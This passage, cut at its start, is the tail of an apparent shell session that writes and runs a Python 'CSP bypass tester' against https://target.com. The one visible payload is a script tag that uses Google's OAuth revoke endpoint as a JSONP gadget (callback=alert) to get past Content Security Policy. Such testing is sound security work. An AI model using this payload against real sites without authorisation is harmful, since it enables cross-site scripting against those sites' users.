            print(' <script src="https://accounts.google.com/o/oauth2/revoke?callback=alert"></script>')
    except Exception as e:
        # Best-effort scan: report the failure instead of crashing.
        print(f"[-] Error: {e}")
if __name__ == "__main__":
    # Script entry point: the target URL is the only required argument.
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_url>")
        sys.exit(1)
    test_csp_bypasses(sys.argv[1])
EOF
chmod +x csp_bypass_tester.py
python3 csp_bypass_tester.py https://target.com